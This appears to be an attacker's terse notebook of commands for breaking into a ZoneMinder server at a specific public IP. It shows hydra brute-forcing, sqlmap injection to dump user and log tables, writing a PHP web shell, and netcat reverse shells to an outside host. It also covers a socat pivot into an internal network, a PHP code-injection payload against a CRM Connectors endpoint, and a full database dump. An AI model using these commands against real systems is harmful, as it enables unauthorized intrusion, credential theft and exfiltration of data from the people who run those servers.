Untitled

nmap
  nmap --unprivileged -sV 87.113.6.72
sqlmp fail
  ./sqlmap.py -u "http://87.113.6.72:8080/zm/index.php" --data "view=request&request=log&task=query&limit=100" -p limit

hydr
  hydra 87.113.6.72 -s 8080 -L users.txt -P passwords.txt http-post-form "/zm/index.php:action=login&view=postlogin&postLoginQuery=&username=^USER^&password=^PASS^:postLoginQuery"

sqlmp true
  ./sqlmap.py -u "http://87.113.6.72:8080/zm/index.php" --data="view=request&request=log&task=query&limit=100&filter[*]=1" --dbms=mysql --cookie="ZMSESSID=[SESSID];zmCSS=flat;zmSkin=classic" –dbs –current-user --technique=e

getpath
  -D zm -T Logs --dump --stop 20

write
  ./sqlmap.py -u "http://87.113.6.72:8080/zm/index.php" --data "view=request&request=log&task=query&limit=100" -p limit --dbms=mysql --cookie="ZMSESSID=[SESSID];zmCSS=flat;zmSkin=classic" --file-write shell.php --file-dest /usr/share/zoneminder/www/webshell.php

test cmd, reverse shell
  87.113.6.72:8080/zm/cmd.php?command=uname -a
  87.113.6.72:8080/zm/cmd.php?command=nc -e /bin/sh 109.51.56.213 1340

nmap red
  nmap -F 192.168.1.0/24

socat
  ->local   socat tcp-listen:1338,reuseaddr,fork tcp-listen:8001,reuseaddr,retry=1
  ->target  socat -t1 tcp:192.168.1.3:80,forever,intervall=1,fork tcp:109.51.56.213:1338

dvr usrs
  ./sqlmap.py -u "http://87.113.6.72:8080/zm/index.php" --data="view=request&request=log&task=query&limit=100&filter[*]=1" --dbms=mysql --cookie="ZMSESSID=[SESSID];zmCSS=flat;zmSkin=classic" -D zm -T Users -C Id,Username,Password --dump --technique=e

rce test
  127.0.0.1:8001/index.php?module=Connectors&action=RunTest&source_id=ext_rest_insideview&ext_rest_insideview_[%27.phpinfo().%27]=1

ncat y reverse
  127.0.0.1:8001/index.php?module=Connectors&action=RunTest&source_id=ext_rest_insideview&ext_rest_insideview_[%27.system('nc -e /bin/sh 109.51.56.213 1339').%27]=1

interactive shell
  python -c "import pty; pty.spawn('/bin/bash')"
  ctrl+z, stty -icanon -echo -isig && fg; stty sane

mysqldump -u X -p --all-databases

download...